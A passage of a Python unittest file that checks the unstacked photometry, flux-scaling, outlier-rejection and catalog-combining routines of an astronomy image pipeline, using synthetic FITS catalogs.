self.images[-1].cat['FLUX_APER'][:] = 2*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages - 1)) < 1e-8).all() )
############
def testChipIds(self):
self.images[-1].cat['IMAFLAGS_ISO'][:] = 16*numpy.ones(self.nObjs)
self.images[-2].cat['FLUX_APER'][:] = 2*numpy.ones(self.nObjs)
self.images[-2].cat['IMAFLAGS_ISO'][:] = 2*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
self.assertEqual(len(combinedFluxs.keys()), 2)
self.assertTrue( 1 in combinedFluxs.keys() )
self.assertTrue( 2 in combinedFluxs.keys() )
for i in [1,2]:
flux, fluxerr = combinedFluxs[i]
self.assertTrue( (numpy.abs(flux - i) < 1e-8).all() )
##############
def testOutliers(self):
self.images[-1].cat['FLUX_APER'][:] = 50*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages-1)) < 1e-8).all() )
##############
def testFluxerr_Area(self):
for image in self.images:
image.rms = 1./__resampling_sigma_scaling__
image.apers = numpy.sqrt(4/numpy.pi)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - numpy.sqrt(2./self.nImages)) < 1e-5).all() )
###############
def testFluxScale(self):
inputFluxscales = numpy.ones(self.nImages)
inputFluxscales[:self.nImages/2] = .5
inputFluxscales[self.nImages/2:] = 1.5
for image, fluxscale in zip(self.images, inputFluxscales):
image.cat['FLUX_APER'][:] = image.cat['FLUX_APER']*fluxscale
combinedFluxs = measureUnstackedPhotometry(self.images,
fluxscale = True)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
flux = flux - flux[0]
self.assertTrue( (numpy.abs( flux ) < 1e-8).all() )
################
def testFluxKey(self):
self.images = []
for i in xrange(self.nImages):
fluxs = numpy.ones(self.nObjs)
fluxerrs = numpy.ones_like(fluxs)
flags = numpy.zeros_like(fluxs)
imaflags = numpy.ones_like(fluxs)
BackGr = numpy.zeros_like(fluxs)
MaxVal = 0.1*numpy.ones_like(fluxs)
NPIX = numpy.zeros_like(fluxs)
cols = []
cols.append(pyfits.Column(name='FLUX_APER', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='FLUXERR_APER', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='FLUX_ISO', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='FLUXERR_ISO', format = 'E', array = fluxs))
cols.append(pyfits.Column(name='Flag', format = 'J', array = flags))
cols.append(pyfits.Column(name='IMAFLAGS_ISO', format = 'J', array = imaflags))
cols.append(pyfits.Column(name='BackGr', format = 'E', array = BackGr))
cols.append(pyfits.Column(name='MaxVal', format = 'E', array = MaxVal))
cols.append(pyfits.Column(name='NPIX', format = 'E', array = NPIX))
cat = ldac.LDACCat(pyfits.BinTableHDU.from_columns(cols))
self.images.append(Image(cat = cat, rms = 0., apers = numpy.ones(1), gain = 1.))
combinedFluxs = measureUnstackedPhotometry(self.images, fluxkey = 'FLUX_APER')
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertEqual(chipid, 1)
self.assertEqual(len(flux), self.nObjs)
self.assertEqual(len(fluxerr), self.nObjs)
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages)) < 1e-8).all() )
####################
###########################
class TestUnstackedPhotometry_vector(unittest.TestCase):
def setUp(self):
self.nImages = 5
self.nApers = 4
self.nObjs = 200
self.images = []
for i in xrange(self.nImages):
fluxs = numpy.ones((self.nObjs, self.nApers))
fluxerrs = numpy.ones_like(fluxs)
flags = numpy.zeros(self.nObjs)
imaflags = numpy.ones_like(flags)
BackGr = numpy.zeros_like(flags)
MaxVal = 0.1*numpy.ones_like(flags)
NPIX = numpy.zeros(self.nObjs)
cols = []
cols.append(pyfits.Column(name='FLUX_APER',
format = '%dE' % self.nApers,
array = fluxs))
cols.append(pyfits.Column(name='FLUXERR_APER',
format = '%dE' % self.nApers,
array = fluxs))
cols.append(pyfits.Column(name='Flag', format = 'J', array = flags))
cols.append(pyfits.Column(name='IMAFLAGS_ISO', format = 'J', array = imaflags))
cols.append(pyfits.Column(name='BackGr', format = 'E', array = BackGr))
cols.append(pyfits.Column(name='MaxVal', format = 'E', array = MaxVal))
cols.append(pyfits.Column(name='NPIX', format = 'E', array = NPIX))
cat = ldac.LDACCat(pyfits.BinTableHDU.from_columns(cols))
self.images.append(Image(cat = cat, rms = 0, apers= numpy.ones(self.nApers), gain = 1.))
############
def testSimple(self):
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertEqual(chipid, 1)
self.assertEqual(flux.shape, (self.nObjs, self.nApers))
self.assertEqual(fluxerr.shape, (self.nObjs, self.nApers))
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages)) < 1e-8).all() )
###########
def testFluxs(self):
expectedFluxs = 10**(-.4*numpy.random.uniform(-9,-2, (self.nObjs, self.nApers)))
for image in self.images:
catflux = image.cat['FLUX_APER']
image.cat['FLUX_APER'][:,:] = expectedFluxs + 0.05*numpy.random.standard_normal((self.nObjs, self.nApers))
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - expectedFluxs) < 1e-1).all() )
############
def testCuts(self):
self.images[-1].cat['MaxVal'][:] = 1e7*numpy.ones(self.nObjs)
self.images[-1].cat['FLUX_APER'][:] = 1e7*numpy.ones((self.nObjs, self.nApers))
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages - 1)) < 1e-8).all() )
############
def testChipIds(self):
self.images[-1].cat['IMAFLAGS_ISO'][:] = 16*numpy.ones(self.nObjs)
self.images[-2].cat['FLUX_APER'][:,:] = 2*numpy.ones((self.nObjs, self.nApers))
self.images[-2].cat['IMAFLAGS_ISO'][:] = 2*numpy.ones(self.nObjs)
combinedFluxs = measureUnstackedPhotometry(self.images)
self.assertEqual(len(combinedFluxs.keys()), 2)
self.assertTrue( 1 in combinedFluxs.keys() )
self.assertTrue( 2 in combinedFluxs.keys() )
for i in [1,2]:
flux, fluxerr = combinedFluxs[i]
self.assertTrue( (numpy.abs(flux - i) < 1e-8).all() )
##############
def testOutliers(self):
self.images[-1].cat['FLUX_APER'][:,:] = 40*numpy.ones((self.nObjs, self.nApers))
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - 1./math.sqrt(self.nImages-1)) < 1e-8).all() )
##############
def testFluxerr_Area(self):
for image in self.images:
image.rms = 1./__resampling_sigma_scaling__
image.apers = numpy.ones(self.nApers)*numpy.sqrt(4/numpy.pi)
combinedFluxs = measureUnstackedPhotometry(self.images)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
self.assertTrue( (numpy.abs(flux - 1) < 1e-8).all() )
self.assertTrue( (numpy.abs(fluxerr - numpy.sqrt(2./self.nImages)) < 1e-5).all() )
###############
def testFluxScale(self):
inputFluxscales = numpy.ones(self.nImages)
inputFluxscales[:self.nImages/2] = .5
inputFluxscales[self.nImages/2:] = 1.5
for image, fluxscale in zip(self.images, inputFluxscales):
image.cat['FLUX_APER'][:,:] = image.cat['FLUX_APER']*fluxscale
combinedFluxs = measureUnstackedPhotometry(self.images,
fluxscale = True)
chipid, (flux, fluxerr) = combinedFluxs.popitem()
flux = flux - flux[0]
self.assertTrue( (numpy.abs( flux ) < 1e-8).all() )
########################
def fluxErr(flux, areanoise, gain):
return numpy.sqrt(flux/gain + areanoise)
############
class TestFluxScale(unittest.TestCase):
def setUp(self):
self.nObjs = 10000
self.nImages = 6
self.areanoise = 1.5
self.gain=900
self.object_TargetFluxs = 10**(-.4*numpy.random.uniform(-9,-3,self.nObjs))
self.object_FluxErrs = fluxErr(self.object_TargetFluxs, self.areanoise,
self.gain)
self.Observed_Fluxs = numpy.zeros((self.nObjs, self.nImages))
for i in xrange(self.nObjs):
self.Observed_Fluxs[i,:] = numpy.random.poisson(lam=self.object_TargetFluxs[i], size=self.nImages)
self.Observed_FluxErrs = fluxErr(self.Observed_Fluxs,
self.areanoise, self.gain)
self.mag_err = 1.0857*self.Observed_FluxErrs / self.Observed_Fluxs
self.mag_aper = -2.5*numpy.log10(self.Observed_Fluxs) + 27
self.mask = numpy.ones_like(self.Observed_Fluxs)
##################
def testMeasureFluxScaling_nooffset(self):
scalings = measureFluxScaling(self.mag_aper,
self.mag_err,
self.mask)
self.assertEquals(len(scalings), self.nImages)
self.assertTrue( (abs(scalings - 1) < .01).all() )
#################
def testMeasureFluxScaling_offset(self):
inputScalings = numpy.ones(self.nImages)
inputScalings[:3] = .5
inputScalings[3:] = 1.5
magScaling = -2.5*numpy.log10(inputScalings)
magScaling = magScaling - numpy.mean(magScaling)
inputScalings = 10**(-.4*magScaling)
measuredFlux = inputScalings*self.Observed_Fluxs
mag_aper = -2.5*numpy.log10(measuredFlux) + 27
mag_err = 1.0857*fluxErr(measuredFlux, self.areanoise, self.gain) / measuredFlux
scalings = measureFluxScaling(mag_aper, mag_err, self.mask)
self.assertEquals(len(scalings), self.nImages)
scaledFluxs = measuredFlux * scalings
for i in xrange(self.nImages):
index = self.nImages - i - 1
scaledFluxs[:,index] = scaledFluxs[:,index] - scaledFluxs[:,0]
###################
def testMeasureFluxScaling_offset_simple(self):
inputScalings = numpy.ones(self.nImages)
inputScalings[:3] = .5
inputScalings[3:] = 1.5
measuredMags = numpy.ones((self.nObjs, self.nImages))
measuredErr = .1*numpy.ones_like(measuredMags)
for i in xrange(self.nImages):
measuredMags[:,i] = - 2.5*numpy.log10(inputScalings[i])
scalings = measureFluxScaling(measuredMags, measuredErr, self.mask)
measuredFluxs = 10**(-.4*measuredMags)
measuredFluxs = measuredFluxs * scalings
offset = measuredFluxs[0,0]
measuredFluxs = measuredFluxs - offset
self.assertTrue( (numpy.abs(measuredFluxs) < .1).all() )
###################
def testHandleBadMags(self):
expectedMags = numpy.zeros(self.nObjs)
expectedMagerrs = .1*numpy.ones(self.nObjs)
inputScalings = numpy.ones(self.nImages)
measuredMags = numpy.ones((self.nObjs, self.nImages))
measuredErr = .1*numpy.ones_like(measuredMags)
for i in xrange(self.nImages):
measuredMags[:,i] = expectedMags - 2.5*numpy.log10(inputScalings[i])
measuredMags[-10:,3] = __bad_mag__
scalings = measureFluxScaling(measuredMags, measuredErr, self.mask)
measuredFluxs = 10**(-.4*measuredMags)
scaledFluxs = measuredFluxs*scalings
scaledFluxs = scaledFluxs - scaledFluxs[0,0]
self.assertTrue( (numpy.abs(scaledFluxs[measuredMags != __bad_mag__] ) < 0.1).all() )
########################
def testSingleObservations(self):
measuredMags = numpy.ones((self.nObjs, self.nImages))
measuredErr = .1*numpy.ones_like(measuredMags)
mask = numpy.zeros_like(measuredMags)
for i in xrange(self.nObjs):
mask[i, i % self.nImages ] = 1
scalings = measureFluxScaling(measuredMags, measuredErr, mask)
self.assertTrue( (numpy.abs(scalings - 1) < 1e-2).all() )
######################
###############
class TestFluxScale_vector(unittest.TestCase):
def setUp(self):
self.nObjs = 10000
self.nImages = 6
self.nApers = 4
self.mask = numpy.ones((self.nObjs, self.nApers, self.nImages))
##################
def testMeasureFluxScaling_offset_simple(self):
expectedMags = numpy.zeros((self.nObjs, self.nApers))
expectedMagerrs = .1*numpy.ones((self.nObjs, self.nApers))
inputScalings = numpy.ones(self.nImages)
inputScalings[:3] = .5
inputScalings[3:] = 1.5
measuredMags = numpy.ones((self.nObjs, self.nApers, self.nImages))
measuredErr = .1*numpy.ones_like(measuredMags)
for i in xrange(self.nImages):
measuredMags[:,:,i] = expectedMags - 2.5*numpy.log10(inputScalings[i])
scalings = measureFluxScaling(measuredMags, measuredErr, self.mask)
measuredFluxs = 10**(-.4*measuredMags)
measuredFluxs = measuredFluxs * scalings
for i in xrange(self.nImages):
index = self.nImages - i - 1
measuredFluxs[:,:,index] = measuredFluxs[:,:,index] - measuredFluxs[:,:,0]
self.assertTrue( (numpy.abs(measuredFluxs) < .1).all() )
###############
class TestCombineFluxs(unittest.TestCase):
# def testStackFluxs_scalar(self):
#
# fluxs = [ i*numpy.ones(10) for i in xrange(6) ]
# expected = numpy.column_stack(fluxs)
# stackedFlux = _stackFluxs(fluxs)
# self.assertEquals(stackedFlux.shape, expected.shape)
# for i in xrange(6):
# self.assertTrue((stackedFlux[i] == expected).all())
#
#
# #################
#
# def testStackFluxs_vector(self):
#
# fluxs=[i*numpy.ones((10,3)) for i in xrange(6)]
# stackedFlux = _stackFluxs(fluxs)
# self.assertEquals(stackedFlux.shape, (10,3,6))
# for i in xrange(6):
# self.assertTrue((stackedFlux[:,:,i] == i*numpy.ones((10,3))).all())
#
# #################
def testWeightedAverage(self):
fluxs = numpy.ones((30,6))
for i in xrange(30):
fluxs[i,:] = i
errs = numpy.ones_like(fluxs)
mask = numpy.ones((30,6))
flux, err = _weightedAverage(fluxs,errs,mask)
self.assertEquals(flux.shape, (30,))
self.assertEquals(err.shape, (30,))
self.assertTrue((flux == numpy.array(xrange(30))).all())
self.assertTrue((abs(err -numpy.ones(30)/numpy.sqrt(6)) < 1e-8).all())
#####################
def testWeightedAverage_mask(self):
fluxs = numpy.ones((30,6))
for i in xrange(30):
fluxs[i,:] = i
fluxs[:,2] = 1e5
errs = numpy.ones_like(fluxs)
mask = numpy.ones((30,6))
mask[:,2] = 0.
flux, err = _weightedAverage(fluxs,errs,mask)
self.assertEquals(flux.shape, (30,))
self.assertEquals(err.shape, (30,))
self.assertTrue((flux == numpy.array(xrange(30))).all())
self.assertTrue((abs(err -numpy.ones(30)/numpy.sqrt(5)) < 1e-8).all())
########################
def testWeightedAverage_vector(self):
testfluxs = [ numpy.ones((30,5)) for i in xrange(6)]
fluxs = _stackFluxs(testfluxs)
for i in xrange(30):
fluxs[i,:,:] = i
errs = _stackFluxs(testfluxs)
mask = numpy.ones((30,5,6))
mask[:,:,2] = 0.
flux, err = _weightedAverage(fluxs,errs,mask)
self.assertEquals(flux.shape, (30,5))
self.assertEquals(err.shape, (30,5))
expectedFluxs = numpy.ones((30,5))
for i in xrange(30):
expectedFluxs[i,:] = i
self.assertTrue((flux == expectedFluxs).all())
self.assertTrue((abs(err - numpy.ones((30,5))/numpy.sqrt(5)) < 1e-8).all())
###########################
def testWeightedAverage_nearzeroweights(self):
testfluxs = [ numpy.ones(30) for i in xrange(6)]
fluxs = _stackFluxs(testfluxs)
for i in xrange(30):
fluxs[i,:] = i
testerrs = [ math.pi*1e30*numpy.ones(30) for i in xrange(6) ]
errs = _stackFluxs(testerrs)
mask = numpy.ones((30,6))
flux, err = _weightedAverage(fluxs,errs,mask)
self.assertEquals(flux.shape, (30,))
self.assertEquals(err.shape, (30,))
self.assertTrue((abs(flux - numpy.array(xrange(30))) < 1e-8 ).all())
self.assertTrue((abs(err - math.pi*1e30*numpy.ones(30)/numpy.sqrt(6)) < 1e-8).all())
##########################
def testWeightedAverage_allbad(self):
fluxs = numpy.ones((30,6))
errs = .1*numpy.ones((30,6))
mask = numpy.zeros_like(fluxs)
flux, err = _weightedAverage(fluxs, errs, mask)
self.assertTrue( (flux == __bad_flux__).all() )
self.assertTrue( (err == __bad_flux__).all() )
###########################
def testStatCombineFluxs(self):
fluxs = numpy.ones((10,5))
errs = .1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
fluxs[:,-1] = 1.1
flux, err = statCombineFluxs(fluxs, errs, mask)
expectedFlux = 1.02
expectedErr = .1/numpy.sqrt(5)
self.assertTrue((expectedFlux == flux).all())
self.assertTrue((expectedErr == err).all())
##########################
def testStatCombineFluxs_5sigmaReject(self):
fluxs = numpy.ones((10,5))
errs = .1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
fluxs[:,-1] = 2
flux, err = statCombineFluxs(fluxs, errs, mask)
expectedFlux = 1
expectedErr = .1/numpy.sqrt(4)
self.assertTrue((expectedFlux == flux).all())
self.assertTrue((expectedErr == err).all())
###########################
def testBadFlux(self):
self.assertTrue(__bad_flux__ < 0)
############################
def testStatCombineFluxs_NullingOutliers(self):
fluxs = numpy.ones((3,5))
fluxs[:,2] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
flux, err = statCombineFluxs(fluxs,errs,mask)
self.assertTrue((flux == 1).all())
self.assertTrue((err == (0.1/numpy.sqrt(4))).all())
###############################
def testStatCombineFluxs_NullingAndLegitOutliers(self):
fluxs = numpy.ones((3,6))
fluxs[:,2] = 1.1
fluxs[:,3] = 2
fluxs[1:,-1] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
flux, err = statCombineFluxs(fluxs,errs,mask)
expectedFlux = 1.025*numpy.ones(3)
expectedFlux[0] = 1.02
expectedErr = (0.1/numpy.sqrt(4)) * numpy.ones(3)
expectedErr[0] = 0.1/ numpy.sqrt(5)
self.assertTrue((numpy.abs(flux - expectedFlux) < 1e-5).all())
self.assertTrue((numpy.abs(err - expectedErr) < 1e-5).all())
###############################
def testStatCombineFluxs_NullingAndLegitOutliers_Vector(self):
fluxs = numpy.ones((3,5,6))
fluxs[:,:,2] = 1.1
fluxs[:,:,3] = 2
fluxs[1:,:,-1] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
flux, err = statCombineFluxs(fluxs,errs,mask)
self.assertEquals(flux.shape, (3,5))
self.assertEquals(err.shape, (3,5))
expectedFlux = 1.025*numpy.ones((3,5))
expectedFlux[0,:] = 1.02
expectedErr = (0.1/numpy.sqrt(4)) * numpy.ones((3,5))
expectedErr[0,:] = 0.1/ numpy.sqrt(5)
self.assertTrue((numpy.abs(flux - expectedFlux) < 1e-5).all())
self.assertTrue((numpy.abs(err - expectedErr) < 1e-5).all())
###############################
def testMedian_Simple(self):
fluxs = numpy.ones((3,5))
fluxs[:,2] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
flux = _median(fluxs, mask)
self.assertTrue((flux == 1).all())
#################################
def testMedian_Mask(self):
fluxs = numpy.vstack(10*[numpy.arange(6)])
fluxs[:,2] = 1e5
errs = 0.1*numpy.ones_like(fluxs)
mask = numpy.ones_like(fluxs)
mask[5:,3] = 0
flux = _median(fluxs, mask)
expected = 3.5*numpy.ones(10)
expected[5:] = 4
self.assertTrue((flux == expected).all())
#################################
def testMedian_vectorFlux(self):
fluxImages = []
for i in xrange(6):
fluxImages.append(i*numpy.ones((10,3)))
fluxs = _stackFluxs(fluxImages)
fluxs[:,:,2] = 1e5
mask = numpy.ones_like(fluxs)
flux = _median(fluxs, mask)
expected = 3.5*numpy.ones((10,3))
self.assertTrue((flux == expected).all())
##############################
class TestCombineCatalogs(unittest.TestCase):
################
def testCombineCats(self):
normkeys = 'FLUX_APER FLUXERR_APER MAG_APER MAGERR_APER BLANK1 BLANK2'.split()
mastercols = [pyfits.Column(name = k,
format = 'E',
array = numpy.ones(30)) \
for k in normkeys]
mastercols[0] = pyfits.Column(name = 'FLUX_APER',
format = 'E',
array = numpy.random.standard_normal(30))
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
for key in zerokeys:
mastercols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
onekeys = 'IMAFLAGS_ISO'.split()
for key in onekeys:
mastercols.append(pyfits.Column(name = key,
format = 'J',
array = numpy.ones(30)))
cats = [ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(mastercols)))]
for i in xrange(5):
cols = [pyfits.Column(name = k,
format = 'E',
array = numpy.random.standard_normal(30)) \
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
for key in onekeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
images = [ Image(cat, rms = 0, apers = numpy.ones(1), gain = 1) for cat in cats ]
keys = normkeys[2:] + zerokeys + onekeys
combinedcat = combineCats(images)
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertTrue((combinedcat['BLANK1'] == 1).all())
self.assertTrue((combinedcat['BLANK2'] == 1).all())
self.assertTrue((combinedcat['FLUX_APER-1'] != 1).all())
self.assertTrue((combinedcat['FLUXERR_APER-1'] != 1).all())
mags, magerrs = calcMags(combinedcat['FLUX_APER-1'],
combinedcat['FLUXERR_APER-1'])
self.assertTrue( (numpy.abs(combinedcat['MAG_APER-1'] - mags) < 1e-5).all() )
self.assertTrue( (numpy.abs(combinedcat['MAGERR_APER-1'] - magerrs) < 1e-5).all())
#######################################
def testCombineCats_doubleprecision(self):
doublekeys = 'ALPHA_J2000 DELTA_J2000'.split()
normkeys = 'FLUX_APER FLUXERR_APER'.split()
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
onekeys = 'IMAFLAGS_ISO'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = 'E',
array = numpy.random.standard_normal(30))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
for key in doublekeys:
cols.append(pyfits.Column(name = key,
format = 'D',
array = numpy.random.standard_normal(30)))
for key in onekeys:
cols.append(pyfits.Column(name = key,
format = 'D',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
keys = normkeys + zerokeys + doublekeys + onekeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain=1) for cat in cats ]
combinedcat = combineCats(images)
self.assertEquals(cats[0]['ALPHA_J2000'].dtype, combinedcat['ALPHA_J2000'].dtype)
self.assertEquals(cats[0]['DELTA_J2000'].dtype, combinedcat['DELTA_J2000'].dtype)
self.assertTrue((abs(cats[0]['ALPHA_J2000'] - combinedcat['ALPHA_J2000']) < 1e-16).all())
self.assertTrue((abs(cats[0]['DELTA_J2000'] - combinedcat['DELTA_J2000']) < 1e-16).all())
##############################
def testCombineCats_vector(self):
normkeys = 'FLUX_APER FLUXERR_APER'.split()
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
onekeys = 'IMAFLAGS_ISO'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = '5E',
array = numpy.random.standard_normal((30,5)))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
for key in onekeys:
cols.append(pyfits.Column(name = key,
format = 'J',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
keys = zerokeys + onekeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain= 1) for cat in cats ]
combinedcat = combineCats(images)
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertEqual(combinedcat['FLUX_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['FLUXERR_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['MAG_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['MAGERR_APER-1'].shape, (30,5))
###################################
def testCombineCats_multichip(self):
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
cats = []
for i in xrange(6):
cols = [ pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)) \
for key in zerokeys ]
if i == 1:
flags = numpy.ones(30)
elif i == 2:
flags = 2*numpy.ones(30)
else:
flags = numpy.random.random_integers(1,2,30)
flags[25:] = 4
flux = numpy.ones(30)
flux[flags==2] = 2
flux[flags==4] = 4
fluxerr = numpy.random.standard_normal(30)
cols.append(pyfits.Column(name = 'FLUX_APER',
format = 'E',
array = flux))
cols.append(pyfits.Column(name = 'FLUXERR_APER',
format = 'E',
array = fluxerr))
cols.append(pyfits.Column(name = 'IMAFLAGS_ISO',
format = 'J',
array = flags))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
keys = zerokeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain= 1) for cat in cats ]
combinedcat = combineCats(images)
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertEqual(combinedcat['FLUX_APER-1'].shape, (30,))
self.assertEqual(combinedcat['FLUXERR_APER-1'].shape, (30,))
self.assertTrue((combinedcat['FLUX_APER-1'][:25] == 1).all())
self.assertTrue((combinedcat['FLUX_APER-1'][25:] == __bad_flux__).all())
self.assertEqual(combinedcat['MAG_APER-1'].shape, (30,))
self.assertEqual(combinedcat['MAGERR_APER-1'].shape, (30,))
self.assertTrue((combinedcat['MAG_APER-1'][:25] == 0).all())
self.assertTrue((combinedcat['MAG_APER-1'][25:] == __bad_mag__).all())
self.assertEqual(combinedcat['FLUX_APER-2'].shape, (30,))
self.assertEqual(combinedcat['FLUXERR_APER-2'].shape, (30,))
self.assertTrue((combinedcat['FLUX_APER-2'][:25] == 2).all())
self.assertTrue((combinedcat['FLUX_APER-2'][25:] == __bad_flux__).all())
self.assertEqual(combinedcat['MAG_APER-2'].shape, (30,))
self.assertEqual(combinedcat['MAGERR_APER-2'].shape, (30,))
self.assertTrue((combinedcat['MAG_APER-2'][:25] == -2.5*numpy.log10(2)).all())
self.assertTrue((combinedcat['MAG_APER-2'][25:] == __bad_mag__).all())
self.assertEqual(combinedcat['FLUX_APER-4'].shape, (30,))
self.assertEqual(combinedcat['FLUXERR_APER-4'].shape, (30,))
self.assertTrue((combinedcat['FLUX_APER-4'][25:] == 4).all())
self.assertTrue((combinedcat['FLUX_APER-4'][:25] == __bad_flux__).all())
self.assertEqual(combinedcat['MAG_APER-4'].shape, (30,))
self.assertEqual(combinedcat['MAGERR_APER-4'].shape, (30,))
self.assertTrue((combinedcat['MAG_APER-4'][25:] == -2.5*numpy.log10(4)).all())
self.assertTrue((combinedcat['MAG_APER-4'][:25] == __bad_mag__).all())
######################
def testCombineCats_instrum(self):
normkeys = 'FLUX_APER FLUXERR_APER'.split()
zerokeys = 'Flag MaxVal BackGr NPIX'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = '5E',
array = numpy.random.standard_normal((30,5)))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
cols.append(pyfits.Column(name = 'IMAFLAGS_ISO',
format = 'J',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
keys = zerokeys
images = [ Image(cat, rms=0, apers=numpy.ones(1), gain=1) for cat in cats ]
combinedcat = combineCats(images, instrum='SUBARU-10_1')
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertEqual(combinedcat['FLUX_APER-SUBARU-10_1-1'].shape, (30,5))
self.assertEqual(combinedcat['FLUXERR_APER-SUBARU-10_1-1'].shape, (30,5))
self.assertEqual(combinedcat['MAG_APER-SUBARU-10_1-1'].shape, (30,5))
self.assertEqual(combinedcat['MAGERR_APER-SUBARU-10_1-1'].shape, (30,5))
##############
def testCombineCats_mastercat(self):
normkeys = 'FLUX_APER FLUXERR_APER'.split()
zerokeys = 'Flag BLANK1 MaxVal BackGr NPIX'.split()
cats = []
for i in xrange(6):
cols = [pyfits.Column(name = k,
format = '5E',
array = numpy.random.standard_normal((30,5)))\
for k in normkeys]
for key in zerokeys:
cols.append(pyfits.Column(name = key,
format = 'E',
array = numpy.zeros(30)))
cols.append(pyfits.Column(name = 'IMAFLAGS_ISO',
format = 'J',
array = numpy.ones(30)))
cats.append(ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols))))
mastercols = []
mastercols.append(pyfits.Column(name = 'FLUX_APER',
format = 'E',
array = 1e5*numpy.ones(30)))
mastercols.append(pyfits.Column(name = 'MAG_APER',
format = 'E',
array = numpy.ones(30)))
mastercols.append(pyfits.Column(name = 'BLANK1',
format = 'E',
array = numpy.ones(30)))
mastercat = ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(mastercols)))
keys = 'MAG_APER BLANK1'.split()
images = [ Image(cat, rms=0, apers=numpy.ones(5), gain = 1) for cat in cats ]
combinedcat = combineCats(images,
mastercat = mastercat)
self.assertEqual(type(combinedcat), type(cats[0]))
for key in keys:
self.assertTrue(key in combinedcat.keys())
self.assertTrue((combinedcat['MAG_APER'] == 1).all())
self.assertTrue((combinedcat['BLANK1'] == 1).all())
self.assertEqual(combinedcat['FLUX_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['FLUXERR_APER-1'].shape, (30,5))
self.assertEqual(combinedcat['MAG_APER-1'].shape, (30,5))
